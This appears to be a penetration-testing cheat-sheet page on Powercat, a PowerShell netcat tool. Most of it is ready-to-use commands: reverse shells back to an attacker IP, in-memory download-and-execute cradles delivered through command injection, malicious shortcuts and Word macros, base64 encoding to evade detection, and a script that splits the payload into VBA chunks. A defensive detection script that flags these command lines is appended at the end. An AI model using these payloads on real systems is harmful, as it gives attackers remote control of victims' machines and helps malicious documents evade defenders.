Tools | February 9, 2026 | 2 min read | by 0xt0pus

Powercat

PowerShell implementation of netcat for reverse shells and file transfers



Description

Powercat is the PowerShell implementation of netcat. It can be used to create reverse shells, bind shells, and transfer files, all from PowerShell. It is especially useful for Windows targets where netcat is not available. It is typically downloaded and executed in memory using a PowerShell download cradle.

GitHub: https://github.com/besimorhino/powercat

Usage 1: Basic Reverse Shell

Connect back to the attacker with a reverse shell, executing cmd as the shell.

Command:

powercat -c <attacker-ip> -p 9999 -e cmd;

Usage 2: Download and Execute Reverse Shell (One-Liner)

Download powercat.ps1 into memory and immediately execute a reverse shell back to the attacker. This is the most common usage pattern.

Command:

iex (New-Object Net.WebClient).DownloadString('http://192.168.45.228/powercat.ps1');powercat -c 192.168.45.228 -p 9999 -e powershell;

Usage 3: Reverse Shell via cmd /c (For Command Injection / Macros)

Use cmd /c to launch PowerShell, download powercat, and execute a reverse shell. Useful in command injection scenarios or when executing from a non-PowerShell context.

Command:

cmd /c powershell IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.45.154/powercat.ps1');powercat -c 192.168.45.154 -p 135 -e powershell

Usage 4: Reverse Shell via Windows Library File / Shortcut (.lnk)

Used in client-side attacks with Windows Library files. Create a shortcut that downloads powercat and starts a reverse shell when the victim clicks it.

Command:

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.152:8000/powercat.ps1');powercat -c 192.168.45.152 -p 4444 -e powershell"

Usage 5: Reverse Shell via Word/ODT Macro

Used inside a VBA or LibreOffice macro to get a reverse shell when the victim opens a malicious document. The shell() function wraps the PowerShell download cradle.

Command:

shell(cmd /c powershell IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.45.154/powercat.ps1');powercat -c 192.168.45.154 -p 135 -e powershell)

Usage 6: Base64-Encoded Reverse Shell for Macros

Encode the powercat download cradle in base64 and embed it in a Word macro to evade detection. The encoded payload is split into 50-character chunks in VBA.

Command (PowerShell command to encode):

IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell

Python Script to Split Base64 for VBA Macro:

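# Command line to embed; the base64 value is truncated here.
payload = "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGUAdwA..."
n = 50  # chunk size in characters

# Emit one VBA string-concatenation line per chunk.
for i in range(0, len(payload), n):
    print("Str = Str + " + '"' + payload[i:i+n] + '"')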
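
A defender-side view of the command forms above, as an added example that is not part of the original page or the powercat project: it triages process command lines (as recorded by process-creation logging) and decodes any -EncodedCommand argument first, so the Usage 6 form is matched like the plain-text cradles. The indicator names, regexes and sample lines are constructed for illustration.

```python
import base64
import re

# Patterns derived from the command forms shown on this page (assumed names).
INDICATORS = {
    "download_cradle": re.compile(r"(?i)\bIEX\b.*\bNet\.WebClient\b.*\bDownloadString\b"),
    "powercat_exec": re.compile(r"(?i)\bpowercat\b.*\s-c\s+\S+.*\s-e\s+\S+"),
    "hidden_window": re.compile(r"(?i)\s-w\w*\s+hidden\b"),
}
ARG = re.compile(r"(?<!\S)[-/]([A-Za-z]+)\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if there is none."""
    for name, value in ARG.findall(cmdline):
        name = name.lower()
        # PowerShell accepts -ec and any prefix of -EncodedCommand.
        if name != "ec" and not "encodedcommand".startswith(name):
            continue
        try:
            # The argument is base64 over UTF-16LE text.
            return base64.b64decode(value, validate=True).decode("utf-16-le")
        except ValueError:
            continue  # e.g. powercat's own "-e powershell" is not base64
    return None


def triage(cmdline):
    """Return the sorted indicator names matched by one process command line."""
    hits = {n for n, rx in INDICATORS.items() if rx.search(cmdline)}
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.add("encoded_command")
        hits |= {n for n, rx in INDICATORS.items() if rx.search(decoded)}
    return sorted(hits)


# Constructed samples: the Usage 6 cradle form with a documentation-range address.
SCRIPT = ("IEX(New-Object System.Net.WebClient).DownloadString("
          "'http://192.0.2.10/powercat.ps1');powercat -c 192.0.2.10 -p 4444 -e powershell")
SAMPLES = [
    "powershell.exe -nop -w hidden -enc " + base64.b64encode(SCRIPT.encode("utf-16-le")).decode(),
    "cmd /c powershell " + SCRIPT,
    "powercat -c 192.0.2.10 -p 9999 -e cmd;",
    "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1",
]
if __name__ == "__main__":
    for line in SAMPLES:
        print(triage(line), "<-", line[:60])
```

The 50-character chunking exists only in the macro source; the spawned process receives the rejoined string, so its command line carries the full -enc argument.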